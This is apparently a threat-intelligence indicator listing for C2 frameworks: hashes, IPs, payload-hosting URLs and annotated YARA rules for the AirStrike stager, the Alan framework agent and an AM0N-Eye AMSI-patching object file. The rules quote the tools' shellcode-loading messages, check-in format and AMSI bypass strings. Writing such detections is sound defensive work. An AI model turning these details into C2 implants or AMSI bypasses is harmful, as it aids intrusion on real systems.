Details | Github username | 6 | its-a-feature |
|
Details | md5 | 19 | 31d6cfe0d16ae931b73c59d7e0c089c0 |
|
Details | md5 (suspect: 32 hex chars that read as raw x64 code bytes — 55 48 89 e5 = push rbp / mov rbp,rsp — not a file hash) | 1 | 554889e541574156415541544d89c457 |
|
Details | md5 (suspect: looks like raw x64 code bytes, not a file hash) | 1 | 554889e54157415641554d89c5415457 |
|
Details | md5 (suspect: looks like raw x64 code bytes, not a file hash) | 1 | 554889e55756534889cb4883e4f04881 |
|
Details | md5 (suspect: looks like raw x64 code bytes, not a file hash) | 1 | 554889e541574156415541544989d4ba |
|
Details | md5 (suspect: looks like raw x64 code bytes, not a file hash) | 1 | 554889e5415541545756534883e4f048 |
|
Details | md5 (suspect: looks like raw x86 code bytes — 55 8b 7c 24 = push ebp / mov edi,[esp+..] — not a file hash) | 1 | 558b7c2458033b893c24e8970400003b |
|
Details | md5 (invalid: not hexadecimal, cannot be an MD5 digest) | 1 | AAAAAAAAAAAAAAAAAAAAAcC0AAAAAAAB |
|
Details | sha1 | 1 | fcd1a3d32b4c37a392c59ffe241b9cb973fde7f4 |
|
Details | sha1 | 1 | 14b06e3755cea0f291ea6246fc315b9b30388640 |
|
Details | sha256 | 1 | be80b172b1e5fd000f5e638ebc8289b9940fa4ca51b75b0dd92ca633cbf1fcb9 |
|
Details | sha256 | 1 | 582886d688fb0e3573afa5f39c7984a2fe99d2ffb50543d354d9286c44dbd1ad |
|
Details | sha256 | 1 | 68a4cd4fcf1f9a0e3a68ac19621adcb214f830c0854f7a9ad18ce453174d31a0 |
|
Details | sha256 | 1 | f8675fea43f09741254d739ce072c0a73df9aa2e8abb670a4c94f2cda0315e03 |
|
Details | sha256 | 1 | c703ffb19774194cbdd674c3feb12ef9942a242ab6569a6e153ba846cf4de852 |
|
Details | sha256 | 1 | a14d6a30e886a19d47fad3e66b8dd5a6ead3e3a0bd7f8d3a6e001542740e9190 |
|
Details | sha256 | 1 | 6382401da4b33f85be0491f73d26080748821f25ce457dfee4c55c43308867c4 |
|
Details | sha256 | 1 | 147cf27ec2845164782b690977545697f77e7df3acc904118722d071eadad0aa |
|
Details | sha256 | 1 | 039586f2d56ef93343980bf7734c350f6898acc457c1bae184391439c1820d86 |
|
Details | sha256 | 1 | f5b1230386f9242f4c88edf893b7d97d901fb55d794c0f27a520d093b232e643 |
|
Details | sha256 | 1 | d6fd0dd6a3a4bde08a2354e9298c1dacc6495c2173100b489e3c1d4526817a40 |
|
Details | sha256 | 1 | 3a9a917e6760f130a71ad17184b7f6ea67787ce0cbd9cfa0260e72b085e6aebe |
|
Details | sha256 | 1 | a72a9b039ddd668ce86022621c6d073048b0d4ab38beb0d9bc98287e5a14c206 |
|
Details | sha256 | 1 | 3b74e42f53475b6bb3792e9a8b5de22e6ab7a8037c10bfa2efca4d8fa2eb66be |
|
Details | sha256 | 1 | a453b3510ef0aa993b88f49d2a6f7a85bfab407033afb23340287b94eddff86d |
|
Details | sha256 | 1 | 1e5a2a850f7cbfc5d306487ec75bbd436e5c8652304ad2b2a8a14b3386e63efd |
|
Details | sha256 | 1 | b33dc013e2168ebb37d8ac80dbcd778c6bda2ede4927b47ec95f32c87ad125fd |
|
Details | sha256 | 1 | 23f0aeb7c61716e936820af851e7f5f04927be31cd540aba7717882161b000fb |
|
Details | sha256 | 1 | b67570680ffd7ebf5c8479e364c7a50ccf293170feb195172b9d907b5f171a88 |
|
Details | sha256 | 1 | b57f0f8fe3a1682b31f61623ed224b387a56ffa21cba3cf0c75bb27e14536413 |
|
Details | sha256 | 1 | ddd797f2afb0f0cf3e85532d937e475f3af778b6032b979f3b739904b2c7bc07 |
|
Details | sha256 | 1 | 21d2d2a5068827890e30ec5438de5ef22401cd67e5aab69e2a76881c842bd4a4 |
|
Details | sha256 | 1 | defaacd4c05addae13998f3dce82e12e2f8f7c48af1e9061071f8157f01f7b61 |
|
Details | sha256 | 1 | 70488c62e7f56badbde76fb5a5d69fa6d7c1d4243f4a256106a7de2e5b4253ca |
|
Details | sha256 | 1 | 86979aca65aef25f18132a2fc328f3d9234298e9d9c3b6cbd4a98a1ac7728c9d |
|
Details | sha256 | 1 | 6d4c2d46f9fd7210da8df30879729a85287d38874dc84436e0f1f295b1072d09 |
|
Details | sha256 | 1 | 3fcc85c86db9e7f5e218d56af9f7ecabbf0284e447c3a70a14c89138d33d384b |
|
Details | sha256 | 1 | 2ca4eb35ab5181c6170421413afccb8f10259a4f6460a28c5b57a92c91672307 |
|
Details | sha256 | 1 | e9eccdb3b023ef3e8d267ff8f32e957b75711b5489cd5df3a000ab7cac53155e |
|
Details | sha256 | 1 | 6d7ba1938fb5de743f867cf3104df89a5e3afed80c0c5861c77e7befc073f3d8 |
|
Details | sha256 | 1 | 1b13d5dab78b7b6c4d85ec5eb9e60854c37287384d7266d5c6583b8367f69583 |
|
Details | sha256 | 1 | 361979575789d281b536a0fac47928de0f7a77a41715271017897a521a601ff8 |
|
Details | sha256 | 1 | 9de63114a0173f1c599cb4035961ce400ffeea6a178f4a89ee542972dcd42154 |
|
Details | sha256 | 1 | c7d36f2d9b3d532e892013a3a74b1dfde6430da4c799bb0b0812e01ad557a13c |
|
Details | sha256 | 1 | ab2ee8a4068329fe2731d82c7ffa31ea1262f67ea08afa58bcd3280b3fbf6324 |
|
Details | sha256 | 1 | 78f9d1e1a0a990515546391c9aea26ee425a0794051d732fff92ded2fa7ba5ce |
|
Details | sha256 | 1 | efa977d502ce60fd5d596b64ff5bd07bb7fa71eb956bc8ca1e33dd23b68a4d8c |
|
Details | sha256 | 1 | f5d0216c16287f0a84689ccfc732c6b4efcb686e2476b2dbd6aa5bb7802fd7df |
|
Details | sha256 | 1 | 8be0f684decfa6e675d9c9b38590222139b088fa236651b73d1a01f5994a7666 |
|
Details | sha256 | 1 | f7486405bd4ebfc2acf96c54202f536079bcbfc68b339550333bbed0ad03825c |
|
Details | sha256 | 1 | 434a0fa442b1322e654142fe6a8bc35df3bcdebacb030ba68c4644f96df5caac |
|
Details | sha256 | 1 | a38370ca0d2421369f30c1bd83cc5a7d393ba86ee16ae277aab2008374e7b278 |
|
Details | sha256 | 1 | b25288c94464546446ee1f9d3b361f979895392219b4316645945dbb6ed045b9 |
|
Details | sha256 | 1 | 144e66ef1ae2d6ec012ee88164141ed386b3240e0876ff63500203b665236511 |
|
Details | sha256 | 1 | ac99a80277cd93f35df6a962fb13fe807a28328433e5d1d8765a13e9bc9562cc |
|
Details | sha256 | 1 | 385c2e83b1f84acd9418c6cfaed52adc943d5b768ebe8dc731a73adf7edaa3a4 |
|
Details | sha256 | 1 | 34f4c3c83c8f700980f464f4f0b17e651c32dd2468fa93d6be65feccdefcb9d7 |
|
Details | sha256 | 1 | 32aa5df260b711119b95cd5e3b31464174c4e75388f8ef65976f77a3c2bfcfa1 |
|
Details | sha256 | 1 | 596a12d0c792569148bf5404d3074ba4fe0fff0f14f48f3244463d0d7a83f5ca |
|
Details | sha256 | 1 | 2c24d72cf36f0abf83faa2d0fdd6728ed945ba9d0e9f787e98d8f25d07f1f384 |
|
Details | sha256 | 1 | 2b1f466ab2c78bb3f8fd287a7cb3c87922317fe7cd348aa699e57b285544c2a9 |
|
Details | sha256 | 1 | 14912bc7b7f9555231f3145f5ed81dd9776ff40d7a750e0908288406762acf31 |
|
Details | sha256 | 1 | ca83ab01d46925f1d3a559affd3398d1cfe5d0abd637413cd5ae25f1fe7bd008 |
|
Details | sha256 | 1 | 85bc111b4d83b7fafd4c72832f23ebeadd1a9a74942aab072c928b1fc8b55625 |
|
Details | sha256 | 1 | 96d0bec95be57bb098632ab49eb8a2f23d3a7c9dc1e288a5fb990fa5ccec1bca |
|
Details | sha256 | 1 | 0860153f607f4536b72d0ee821628077aa4e17f2465a00424b798c9e720505ef |
|
Details | sha256 | 1 | 066857279d1e93a2ffdb1df8e1d509f6cc58a60083674e842a1e178cf1483904 |
|
Details | sha256 | 1 | 4f9e6582ebf1b3d5077d8a94b3696bc71f43984c7672c9eb696868f9dd711bca |
|
Details | sha256 | 1 | 045312cb098438fe9dbcecf713766bff29d171726fb228de92ef54447564bbb4 |
|
Details | sha256 | 1 | ba606da59063a837e704a49b065979ad4ea4b508c8600e520a8c69948332661b |
|
Details | sha256 | 1 | d5a3de19ef84c040a5b0058fb4fb2a036c9a8db7495763bcc7b7070f16cde967 |
|
Details | sha256 | 1 | 0c1d6b6f18811bda502df7302025950b189a75368185f9632ed96cc694ee4f8e |
|
Details | sha256 | 1 | 195a255225c246f360d80e4ac4287cbcd4ca8025a68631dfa3c28b365cd5a25c |
|
Details | sha256 | 1 | cb72621b89c8a1d9686846183e86a09d7564d085927be2f483d739aeb60fcfdd |
|
Details | sha256 | 1 | eaf734a532b9312168cbcbbea00d08171546bc8560b7131904bd5ea77090e9d3 |
|
Details | sha256 | 1 | cf654c92792fd8964025e9dd7dc2dc0181b15c4868134ec92ad4ac166dc99050 |
|
Details | sha256 | 1 | 2e8341a042e4c26fa6cfe2606075a56aa47587b7ca934789da3cb486cca871b7 |
|
Details | sha256 | 1 | 83c92e978a094fbc4d2c5f8d009a28da54c5677c1d55af61c3c2e2c33ea712af |
|
Details | sha256 | 1 | b059fc8cce2a0ca169dd3aae76c13d43a3fee0821a2bbb5b0d8b97d067c6eb08 |
|
Details | sha256 | 1 | 6a5605da5f7207b1b14b798e9428c2310633664eed53ce7bdb39a6847eff6609 |
|
Details | sha256 | 1 | c337983b7eefbea3cc02e4d011398292ccbd475ba932ced40603a4a9a3927032 |
|
Details | sha256 | 1 | 28bcbcf21baaf1310fbda8a9e2d34d480d1f8e5f65d87abba6326a71565d1714 |
|
Details | sha256 | 1 | 933241f02ef81bef5f6b51ce3e5b3dbf242c829f899f64d2f10b0bad668a6424 |
|
Details | sha256 | 1 | 46be6cee13305cd4175e75a37308478ff48685665bbb062b8c665d672f0f4b0d |
|
Details | sha256 | 1 | 9fb7870c7c1dc8d2dd61ba77e34efe580ad0151c9b59b201b17a45a211d8ff49 |
|
Details | sha256 | 1 | f7f92158b53e6bcd8b2eb293e4802e2759c1943096e2da3d03486f36f053801c |
|
Details | sha256 | 1 | 8ed63f7ea1a79dbf2cc9a338feff1dd4491a9daac38d4c86f67d7211783ae272 |
|
Details | sha256 | 1 | 3a29a9b0f0e5ff1b61fa052a2173987b9f990616043791826e7426df603c43d1 |
|
Details | sha256 | 1 | df8474fe610372aff283b0429626e1663b27e7c651242fbc7687ca6fd2d45caa |
|
Details | sha256 | 1 | 8ce3b90e96a7cfabb6b2b4fc692ea7ca8da105754eb06f662b572e5f549f280f |
|
Details | sha256 | 1 | f770e4b68e8d911e51a4de4cd84b36f290b7fcabe866063e26cee47afd98ba6c |
|
Details | sha256 | 1 | fc02c496d646b60fd70e2ad4be6e35b3f16aaf6c34ee47a7fb81d00cd54ab383 |
|
Details | sha256 | 1 | a7fbb82f2606e3ec217d94fe83d4127e3a5a47290141875ff150243024fb2259 |
|
Details | sha256 | 1 | 9062d8c9e744b3963ea16f1df295fdf9e463902bfe37b8bae376a21a441851b4 |
|
Details | sha256 | 1 | 1193794ebfc3f9ae58e6bb443ecd783274285396c8b23533683e10da0c9d5c53 |
|
Details | sha256 | 1 | e3823d2aaaf868aba237b034a13bf8ef6dd6cf0fc4c29f7e7c247d57b06ff61c |
|
Details | sha256 | 1 | a7f763a818db6da6433b4ffcafbbbd680597fee28bb97760ddd384caf0c25992 |
|
Details | sha256 | 1 | 33827cd5a6e15bbaf99e65f767e65e1b639f48d6b6bb7a6e9e8c8cf02355a1e7 |
|
Details | sha256 | 1 | 8653f19782f1e19e86caf6fdadc17790eb9d68ff34c8a249e9e9e26ba8000c88 |
|
Details | sha256 | 1 | 0b5c8f00eeaa6a63764f7f4807b53b37696882027443cf458895409c07aad26a |
|
Details | sha256 | 1 | 6d520463f8563d6a296d22b6824c690c9b6de8121c9b6f08307947874667c5f2 |
|
Details | sha256 | 1 | 696e2d58b3a3d21ef422fc5103c4cc1a601f359ee1721eb9ecb099be95f229a7 |
|
Details | sha256 | 1 | dd654eb75c1f3736d4b5282e7338a5efcbd7481fc7b46ec38a3ff0ea573c408e |
|
Details | sha256 | 1 | cb96cca9101899754efc33859353e0834496a98ee4381b1a9158c7403e1562d2 |
|
Details | sha256 | 1 | 03c10e261a138666a1c5cf9cb577e8d73e041b1dae0a3d1198d116e4c2b5dec3 |
|
Details | sha256 | 1 | 04ced8976f86801a23ee5fa1fb33f7cab5638039fb6d2a441a169784ce37adf9 |
|
Details | sha256 | 1 | ce950ee11e27e0a95840fa12c878af19910aa82d1ccd5eb99ab99c4131571989 |
|
Details | sha256 | 1 | fc454c2453d9cf6b64c0e6ffab76e6f26c584698a454c7cf2e07d96b11a29fb6 |
|
Details | sha256 | 1 | ddc5047d6a8bb245644c5385ead8fa0d3b751f2aabf9e88e423e0b9862e65019 |
|
Details | sha256 | 1 | f83bbf7318f982ddb457863cf2b45e13c402c2eff5bb1a4d5b8f074295ff46f9 |
|
Details | sha256 | 1 | dba80b543f6d39f2d0631f6cfebef961259746e6f70fb0cf1431e85343ba7d32 |
|
Details | sha256 | 1 | 8b534d0f9f699d6a02aca559f2699d914b0b3f8749e0d206bece0fe09b92ccc6 |
|
Details | sha256 | 1 | 162fc5cdd4ed03ab16da5edd076bc05e87dae1a41b053dddbcc8cac06baa8a63 |
|
Details | sha256 | 1 | ce0fe31e5c1fe918f766ab2e83daaac9e58cce3972c0872f8d1b2de03417528f |
|
Details | sha256 | 1 | 720ded9560168b206152cceab0fcfa8138ad92311a0cf4b5bdf7ba0bd8074839 |
|
Details | sha256 | 1 | 11d05c91663798116f6426c24166bdd648c519f6f95bdff4659dd56c575e7978 |
|
Details | sha256 | 1 | 39391bffd11e6e525b02ea4cd5b3b4422c072126424b7031db346d260a4bd127 |
|
Details | sha256 | 1 | 019fa586cbbdc875e72e614ab1917a93bcbc14bb0fa1731d0643b93c3763db2a |
|
Details | IPv4 | 1 | 192.168.17.131 |
|
Details | IPv4 | 1441 | 127.0.0.1 |
|
Details | IPv4 | 109 | 1.0.0.0 |
|
Details | IPv4 | 25 | 6.0.0.0 |
|
Details | IPv4 | 97 | 10.0.0.1 |
|
Details | IPv4 | 262 | 192.168.1.1 |
|
Details | IPv4 | 1 | 192.168.1.175 |
|
Details | Pdb | 2 | apphost.pdb |
|
Details | Pdb | 1 | sharpc2.pdb |
|
Details | Pdb | 1 | api.pdb |
|
Details | Url | 2 | https://go.microsoft.com/fwlink/?linkid=798306 |
|
Details | Url | 1 | https://aka.ms/dotnet-core-applaunch? |
|
Details | Url | 3 | https://graph.microsoft.com/.default |
|
Details | Url | 7 | https://content.dropboxapi.com/2/files/download |
|
Details | Url | 8 | https://content.dropboxapi.com/2/files/upload |
|
Details | Url | 1 | https://api.dropboxapi.com/2/files/get_metadata |
|
Details | Url | 2 | https://api.dropboxapi.com/2/files/list_folder |
|
Details | Url | 1 | https://api.dropboxapi.com/2/files/move |
|
Details | Url | 3 | https://api.dropboxapi.com/2/files/delete |
|
Details | Url | 3 | http://schemas.microsoft.com/exchange/services/2006/messages |
|
Details | Url | 22 | http://www.w3.org/2001/xmlschema |
|
Details | Url | 24 | http://schemas.xmlsoap.org/soap/envelope |
|
Details | Url | 1 | http://kali.host/mikec2.exe |
|
Details | Url | 1 | http://127.0.0.1/test.exe |
|
Details | Url | 1 | http://127.0.0.1/shellcode.bin |
|
Details | Url | 1 | https://raw.githubusercontent.com/empireproject/empire/fcd1a3d32b4c37a392c59ffe241b9cb973fde7f4/lib |
|
Details | Url | 1 | https://github.com/its-a-feature/mythic/blob/master/payload_types/apfell/agent_code/shell.js#l2 |
|
Details | Url | 1 | https://github.com/its-a-feature/mythic/blob/14b06e3755cea0f291ea6246fc315b9b30388640/payload_types/apfell/agent_c |
|
Details | Url | 1 | https://github.com/its-a-feature/mythic/blob/master/payload_types/apfell/agent_code/base/apfell-jxa.js#l116 |
|
Details | Url | 1 | https://github.com/its-a-feature/mythic/blob/master/payload_types/apfell/agent_code/c2_profiles/http.js#l115 |
|
Details | Url | 1 | https://github.com/its-a-feature/mythic/blob/master/payload_types/apfell/agent_code/base/apfell-jxa.js#l9 |
|
Details | Url | 1 | https://github.com/its-a-feature/mythic/blob/master/payload_types/apfell/agent_code/base/apfell-jxa.js#l70 |
|
Details | Url | 1 | https://github.com/its-a-feature/mythic/blob/master/payload_types/apfell/agent_code/base/apfell-jxa.js#l2 |
|
Details | Url | 1 | https://github.com/its-a-feature/mythic/blob/master/payload_types/apfell/agent_code/base/apfell-jxa.js#l106 |
|
Details | Url | 1 | https://howto.thec2matrix.com |
|
Details | Url | 5 | https://attack.mitre.org/tactics/ta0011 |
|
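Details | Yara rule | 1 |
import "hash"
import "pe"

// AirStrike C2 stager (AirStrike-x64.exe / AirStrike-x86.exe).
//
// Condition tiers are ordered cheapest-first so YARA's left-to-right
// short-circuit evaluation stops before computing a full-file SHA-256 for
// every scanned file (the original put the hash comparisons first, which
// forces hash.sha256(0, filesize) on every file regardless of type/size):
//   1. PE magic + size cap + 8 of the strings, gated on the four imports the
//      stager needs (VirtualProtect for the RWX flip, TerminateProcess for
//      "[+] Killing process", CryptBinaryToStringW for base64-encoding the
//      check-in, InternetConnectW for the WinINet transport);
//   2. all 20 strings, same import gate;
//   3. exact SHA-256 of the two analysed samples (only catches those builds).
//
// Hunting notes grounded in the strings: $s3 is the POST check-in body and
// $s14 a custom request header, both usable for proxy-log hunting; $s15 is
// the author's lab C2 address baked into the sample and will change per build.
rule AirStrike
{
    meta:
        description = "AirStrike - AirStrike-x64.exe, AirStrike-x86.exe"
        sha256_1 = "be80b172b1e5fd000f5e638ebc8289b9940fa4ca51b75b0dd92ca633cbf1fcb9"
        sha256_2 = "582886d688fb0e3573afa5f39c7984a2fe99d2ffb50543d354d9286c44dbd1ad"

    strings:
        // Operator-facing status messages and check-in format: specific to this stager.
        $s1 = "[-] Copied shellcode to memory" ascii fullword
        $s2 = "[-] Received shellcode of size %d" ascii fullword
        $s3 = "username=%s&pid=%d&machine=%s&domain=%s&arch=%s&process=%s&version=%s" ascii fullword
        $s4 = "[+] Killing process" ascii fullword
        $s6 = "[-] Thread finished" ascii fullword
        $s7 = "[-] Created thread" ascii fullword
        $s9 = "[-] Changed memory protection" ascii fullword
        $s10 = "[+] Request sent" ascii fullword
        $s11 = "[-] Received response of size %d" ascii fullword
        $s12 = "[+] Data: %s" ascii fullword
        $s14 = "X-Session-ID: %s" ascii fullword
        $s18 = "[-] Allocated memory at %p" ascii fullword

        // Weak strings, kept for parity with the published rule: $s5/$s13/$s17
        // are standard application-manifest XML, $s8 a widely reused Chrome UA,
        // $s16/$s19/$s20 MSVC CRT/linker artefacts, $s15 the lab C2 address.
        // Seven of them can appear in an unrelated MSVC binary, so the
        // "8 of them" tier effectively rests on the import gate plus at least
        // one of the specific strings above.
        $s5 = " <requestedExecutionLevel level='asInvoker' uiAccess='false' />" ascii fullword
        $s8 = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36" ascii fullword
        $s13 = " <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">" ascii fullword
        $s15 = "192.168.17.131" ascii fullword
        $s16 = ".rdata$voltmd" ascii fullword
        $s17 = " </trustInfo>" ascii fullword
        $s19 = "_get_initial_narrow_environment" ascii fullword
        $s20 = "_set_app_type" ascii fullword

    condition:
        (
            pe.imports("kernel32.dll", "VirtualProtect") and
            pe.imports("kernel32.dll", "TerminateProcess") and
            pe.imports("crypt32.dll", "CryptBinaryToStringW") and
            pe.imports("wininet.dll", "InternetConnectW") and
            (
                (uint16(0) == 0x5a4d and filesize < 40KB and 8 of them) or
                all of them
            )
        )
        // Exact-sample fallback, evaluated last because it hashes the whole file.
        or hash.sha256(0, filesize) == "be80b172b1e5fd000f5e638ebc8289b9940fa4ca51b75b0dd92ca633cbf1fcb9"
        or hash.sha256(0, filesize) == "582886d688fb0e3573afa5f39c7984a2fe99d2ffb50543d354d9286c44dbd1ad"
}
|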
|
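Details | Yara rule | 1 |
import "hash"
import "pe"

// Alan C2 framework agent (wqjs_x64.exe / wqjs_x86.exe).
//
// Two fixes relative to the published rule:
//   * The original's final "or (all of them)" sat outside the parenthesised
//     import/PE group (because `and` binds tighter than `or`), so a file with
//     all 20 strings matched with no PE-magic or import gate at all; the
//     sibling AirStrike rule nests that branch inside the gate, and this rule
//     now does the same.
//   * The full-file SHA-256 comparisons are evaluated last instead of first,
//     so the hash is only computed for files that fail the cheap tiers.
//
// Caveat for tuning: most of $s1..$s20 look like embedded JavaScript-engine
// error strings (proxy/ownKeys, new.target, RegExp exec, module export text)
// rather than agent-specific text, and the five gated imports are common
// Win32 APIs, so the "8 of them" tier may fire on unrelated binaries that
// embed the same engine. $s3, $s10, $s16 and $s17 are the least generic.
rule AlanFramework
{
    meta:
        description = "AlanFramework - wqjs_x64.exe, wqjs_x86.exe"
        sha256_1 = "68a4cd4fcf1f9a0e3a68ac19621adcb214f830c0854f7a9ad18ce453174d31a0"
        sha256_2 = "f8675fea43f09741254d739ce072c0a73df9aa2e8abb670a4c94f2cda0315e03"

    strings:
        $s1 = "proxy: target property must be present in proxy ownKeys" ascii fullword
        $s2 = "AppPolicyGetProcessTerminationMethod" ascii fullword
        $s3 = "Storage error: %d - '%s'" ascii fullword
        $s4 = "proxy: inconsistent getOwnPropertyDescriptor" ascii fullword
        $s5 = "proxy: property not present in target were returned by non extensible proxy" ascii fullword
        $s6 = "new.target only allowed within functions" ascii fullword
        $s7 = "GetTempPath2W" ascii fullword
        $s8 = "expecting target" ascii fullword
        $s9 = "circular reference when looking for export '%s' in module '%s'" ascii fullword
        $s10 = "Failed to read file header" ascii fullword
        $s11 = "getOwnPropertyDescriptors" ascii fullword
        $s12 = "operator %s: no function defined" ascii fullword
        $s13 = "new.target" ascii fullword
        $s14 = "out of memory in regexp execution" ascii fullword
        $s15 = "getenviron" ascii fullword
        $s16 = "curl -s -i" ascii fullword
        $s17 = "Failed to write header to the disk" ascii fullword
        $s18 = "invalid import binding" ascii fullword
        $s19 = "invalid descriptor flags" ascii fullword
        $s20 = "RegExp exec method must return an object or null" ascii fullword

    condition:
        (
            pe.imports("kernel32.dll", "CreateProcessW") and
            pe.imports("kernel32.dll", "TerminateProcess") and
            pe.imports("kernel32.dll", "FindNextFileW") and
            pe.imports("kernel32.dll", "RemoveDirectoryW") and
            pe.imports("crypt32.dll", "CryptStringToBinaryA") and
            (
                (uint16(0) == 0x5a4d and filesize < 3000KB and 8 of them) or
                all of them
            )
        )
        // Exact-sample fallback, evaluated last because it hashes the whole file.
        or hash.sha256(0, filesize) == "68a4cd4fcf1f9a0e3a68ac19621adcb214f830c0854f7a9ad18ce453174d31a0"
        or hash.sha256(0, filesize) == "f8675fea43f09741254d739ce072c0a73df9aa2e8abb670a4c94f2cda0315e03"
}
|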
|
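Details | Yara rule | 1 |
import "hash"

// AM0N-Eye amsi-inject.o: a Beacon Object File that patches
// AmsiOpenSession inside a remote process (strings $x1/$s2/$s4/$s11/$s13).
//
// This is a COFF object, not a PE, so there is no MZ header and the pe
// module does not apply: uint16(0) == 0x8664 is IMAGE_FILE_MACHINE_AMD64,
// i.e. an x64 object file. The cheap COFF/size/string tier is evaluated
// before the exact-sample SHA-256 so the full-file hash is only computed
// for files that miss it (the published rule hashed first).
//
// Threshold note: "4 of them" counts $x1, so the string tier really means
// $x1 plus three more. $s5/$s6/$s8/$s9/$s10/$s12 are import stubs shared by
// any BOF using the same APIs, and $s14/$s15 are compiler/section artefacts,
// so those three extra matches add little beyond the $x1 requirement.
rule AM0NEye_AmsiInject
{
    meta:
        description = "AM0NEye - amsi-inject.o"
        sha256 = "c703ffb19774194cbdd674c3feb12ef9942a242ab6569a6e153ba846cf4de852"

    strings:
        // Required: the BOF's own failure message.
        $x1 = "Fail - Could not patch AMSI.AmsiOpenSession in remote process: PID:%d" ascii fullword

        // Tool-specific text and symbols.
        $s2 = "Success - Patched AMSI.AmsiOpenSession in remote process: PID:%d" ascii fullword
        $s3 = "amsi.dll" ascii fullword
        $s4 = "Attempting to patch AMSI in remote process with PID: %d" ascii fullword
        $s7 = "amsi-inject.c" ascii fullword
        $s11 = "patchAmsiOpenSession" ascii fullword
        $s13 = "AmsiOpenSession" ascii fullword

        // Generic BOF import stubs and build artefacts (weak on their own).
        $s5 = "__imp_KERNEL32$OpenProcess" ascii fullword
        $s6 = "__imp_KERNEL32$WriteProcessMemory" ascii fullword
        $s8 = "__imp_KERNEL32$GetProcAddress" ascii fullword
        $s9 = "__imp_KERNEL32$CloseHandle" ascii fullword
        $s10 = "__imp_KERNEL32$LoadLibraryA" ascii fullword
        $s12 = "__imp_BeaconDataInt" ascii fullword
        $s14 = "GCC: (GNU) 10-win32 20220324" ascii fullword
        $s15 = "P@.xdata" ascii fullword

    condition:
        (uint16(0) == 0x8664 and filesize < 5KB and 1 of ($x*) and 4 of them)
        // Exact-sample fallback, evaluated last because it hashes the whole file.
        or hash.sha256(0, filesize) == "c703ffb19774194cbdd674c3feb12ef9942a242ab6569a6e153ba846cf4de852"
}
|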